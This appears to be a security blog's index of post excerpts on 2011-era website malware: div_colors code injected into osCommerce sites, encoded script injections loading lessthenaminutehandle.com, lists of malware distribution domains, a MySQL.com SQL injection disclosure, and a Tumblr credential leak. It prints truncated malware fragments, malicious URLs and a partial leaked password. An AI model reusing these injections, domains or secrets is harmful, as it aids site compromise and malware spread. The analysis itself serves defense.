The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


Read More

Will Google blacklist itself?

We were analyzing an infected site today and their Google blacklist diagnostic said the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.

Hum… So Google.com was somehow infected as well? I know it is probably some small sub site from within Google, but I found it interesting that they listed Google’s main domain in there.

If you look at Google’s own diagnostic page, it says:

31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.

 
Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.

 
Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.

Let’s see if Google actually blacklists themselves :)

Malware week: The div_colors, CreateCSS and others

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.

div_colors

For example, the div_colors malware that infected a lot of osCommerce sites, looks like a javascript color picker. This is how it looks like in an infected site:

if (typeof(redef_colors)==”undefined”) {

var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);


Read More

MySQL.com compromised

MySQL.com (the official site for the MySQL database) was compromised via (shocking!) blind SQL injection. A post was sent today to the full disclosure list explaining the issue and dumping part of their internal database structure.

Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
Host IP : 213.136.52.29
Web Server : Apache/2.2.15 (Fedora)
Powered-by : PHP/5.2.13
Injection Type : MySQL Blind
Current DB : web


Read More

Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.

These are just some of the ones used in the last 24 hours:

http://defender-dyxa.co.cc/scan1/188

http://antivirus-3879.co.cc/scan1/188

http://antivirus-9465.co.cc/scan1/188

http://antivirus-4274.co.cc/scan1/188

http://yquwtuog.co.cc/scan1/188

http://mrxzvtwt.co.cc/scan1/188

http://lowoxnsm.co.cc/scan1/188

http://iuhcypsp.co.cc/scan1/188

http://vycdmonz.co.cc/scan1/188

http://zgfozmcr.co.cc/scan1/188

http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D

http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D

http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D

http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D

http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D

http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D

http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D

www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

As you can see, changing from .cc, .co.cc, .in., .rr.nu and even some .com in there. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. By checking those on Google, none of them got blacklisted, showing that their tactics are working.

We will keep posting details we learn more.


If your site is infected with malware or blacklisted, we are here to help.

Attacks against IIS/ASP sites – alisa-carter dot com

Over the last few days, we’ve seen a number of sites getting hacked with a malware script pointing to http://alisa-carter.com/ur.php . It is done using the same SQL injection attack as used in therobint-us mass infection a few months ago.

Multiple domains are being used to distribute the malware, including:

http://alisa-carter.com/ur.php

http://google-stats50.info/ur.php

http://pop-stats.info/ur.php

http://sol-stats.info/ur.php

http://online-guest.info/ur.php

http://google-stats48.info/ur.php

http://google-stats49.info/ur.php

http://google-stats50.info/ur.php

http://multi-stats.info/ur.php


Read More

Tumblr mistake or security issue

There is a post on Hacker News about a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. Here is some of the stuff that was disclosed:

Database::set_defaults(array( ‘user’ => ‘tumblr3′, ‘password’ => ‘m3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′, ..

define(‘MEMCACHE_HOST’, ’10.252.0.68′); define(‘MEMCACHE_VERSION_HOST’, ‘10.252.0.67‘);

Database::add(‘primary’, array(‘host’ => ’192.168.200.142‘)); ..


Read More

Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).

This hack also injects the malware on every post in the database, but this time encoded as:

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..


Read More

Solution for the link injection spam from basicpills

We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those links from all their posts. On large WordPress sites, it can be a very tedius task to go through thousands of posts manually removing each link spam…

To help out, we posted a clean up script here http://tools.sucuri.net/malware/helpers/spam-postremoval.txt for anyone that needs to clean up their site. It will remove link spam from the 4 domains that are the most commonly used in this attack:

Read More

Oracle.com, Wetpaint, Spammers, and the Tale of an Unmoderated Wiki

Update: A few hours after this post going live, it seems that Oracle started to clean up the wiki. Very good!

Oracle’s official Wiki (at http://wiki.oracle.com ) is becoming a haven for spammers. The site has a high page rank (PR 7), is completely open and unmoderated, uses a free builder from wetpaint.com (yes, you have to create an account at wetpaint.com to participate there) and looks to have no one taking care of it.

Guess what happens when you visit? Try to visit their main page (wiki.oracle.com – Scanned link) to see by yourself:



Read More